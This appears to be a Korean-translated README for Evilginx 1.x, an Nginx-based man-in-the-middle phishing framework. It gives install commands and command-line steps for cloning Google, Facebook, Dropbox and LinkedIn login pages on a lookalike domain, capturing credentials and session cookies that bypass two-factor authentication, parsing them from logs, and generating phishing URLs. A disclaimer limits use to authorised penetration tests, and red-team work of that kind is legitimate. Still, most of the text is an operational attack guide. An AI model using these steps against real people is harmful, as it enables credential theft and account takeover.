
새 버전을 사용하세요: https://github.com/kgretzky/evilginx2

이 버전은 구식입니다. 최신 버전을 사용하세요!
EVILGINX 2: https://github.com/kgretzky/evilginx2
Evilginx는 피싱 자격 증명과 세션 쿠키를 탈취하기 위한 중간자 공격 프레임워크입니다. 핵심은 Nginx HTTP 서버 위에서 동작하며, proxy_pass와 sub_filter를 사용하여 HTTP 콘텐츠를 프록시하고 수정하면서 클라이언트와 서버 간의 트래픽을 가로챕니다.
작동 방식과 직접 설치하는 방법은 제 블로그에서 확인할 수 있습니다:
첫 번째 글은 현재 약간 구식입니다: Evilginx - Advanced Phishing With Two-factor Authentication Bypass
Evilginx 1.0 업데이트: Evilginx 1.0 Update - Up Your Game in 2FA Phishing
Evilginx 1.1 업데이트: Evilginx 1.1 Update
Evilginx가 매우 악의적인 목적으로 사용될 수 있다는 점을 알고 있습니다. 이 작업은 숙련된 공격자가 할 수 있는 일을 단순히 보여주기 위한 것입니다. 방어자는 이러한 공격을 고려하여 방어 체계를 구축하고 이 피싱 방법으로부터 보호할 방법을 찾아야 할 책임이 있습니다. Evilginx는 피싱 대상의 서면 허가를 받은 합법적인 침투 테스트 과제에서만 사용되어야 합니다.
Evilginx는 install.sh 설치 스크립트를 제공합니다. 이 스크립트는 Debian wheezy/jessie 머신에서 전체 패키지를 한 번에 설치합니다.
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configure Evilginx.
parse Parse log file(s).
genurl Generate phishing URL.
optional arguments:
-h, --help show this help message and exit
sites 디렉토리에서 제공되는 Evilginx 템플릿을 사용하여 Nginx 서버와 함께 사용할 사이트 구성을 활성화 또는 비활성화합니다.
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Your phishing domain.
-y Answer all questions with 'Yes'.
-l, --list List available supported apps.
--enable ENABLE Enable following site by name.
--disable DISABLE Disable following site by name.
사용 가능한 사이트 구성 템플릿 목록:
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
사전 등록된 피싱 도메인 not-really-google.com로 google 피싱 사이트 활성화:
python evilginx.py setup --enable google -d not-really-google.com
facebook 피싱 사이트 비활성화:
python evilginx.py setup --disable facebook
Nginx 로그를 파싱하여 가로챈 로그인 자격 증명과 세션 쿠키를 추출합니다. 로그는 기본적으로 evilginx.py 스크립트가 있는 logs 디렉토리에 저장됩니다.
설정 단계에서 자동 파싱을 활성화한 경우 자동으로 수행할 수 있습니다.
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to parse logs for ('all' to parse logs
for all sites).
--debug Does not truncate log file after parsing.
google 사이트에 대해서만 로그 파싱:
python evilginx.py parse -s google
모든 사이트에 대해 로그 파싱:
python evilginx.py parse -s all
Red Team 평가에서 사용할 수 있는 피싱 URL을 생성합니다.
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to generate link for.
-r REDIRECT, --redirect REDIRECT
Redirect user to this URL after successful sign-in.
성공적인 로그인 후 피해자를 rickroll 동영상으로 리디렉션하는 google 피싱 URL 생성:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ